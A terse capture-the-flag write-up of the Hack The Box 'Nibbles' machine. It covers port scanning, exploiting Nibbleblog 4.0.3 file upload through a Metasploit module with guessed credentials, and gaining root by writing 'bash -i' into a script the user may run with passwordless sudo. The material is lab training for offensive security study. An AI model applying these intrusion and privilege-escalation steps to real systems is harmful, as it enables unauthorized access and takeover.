Nibbles
HTB 6. Nibbles
Port 22 and 80 open from
nmap -A -T4 -p- 10.10.10.75, typically 80 is for the exploit and 22 is used later. SSH is usually not the exploit.searchsploit apache 2.4Going to
10.10.10.75shows "Hello World" onlyViewing source shows
10.10.10.75/nibbleblog/on nibbleblog platformsearchsploit nibblefinds Nibbleblog 4.0.3 arbitrary file upload and remote code executionIn metasploit
use exploit/multi/http/nibbleblog_file_uploadandinfoshows we need to be authenticateddirbusterto find login pagesCould potentially use Burp Suite to brute force usernames and password or just bruteforce password with admin as username. Potentially use
cewlon blog posts to create password list.Credentials are
admin:nibbles, guessed by site name.Set parameters in metasploit to the username, password, rhosts, and
targeturi=/nibbleblog.This works because of the
My Imageplugin that allows any file to be uploaded (no whitelisting is being done)sysinfoshows4.4.0 ubuntuandgituidshownibbler (1001)Searching for priv_esc
shell cd /home/nibbler ls -la cat user.txt history cat .bash_history sudo -lsudo -lreveals~/personal/stuff/monitor.shcan run as root without a passwordThis folder does not exist so we can create a shell script in that location.
personal.zipexists, potentially try and crack ituname -ato print entire OS running and potentially search for exploits for the general OSLinEnum.shandlinuxprivchecker.pyare great scripts for enumerating linux.echo "bash -i" > monitor.shandchmod +x monitor.shsudo /home/nibbler/personal/stuff/monitor.shcat
/root/root.txt
Last updated
Was this helpful?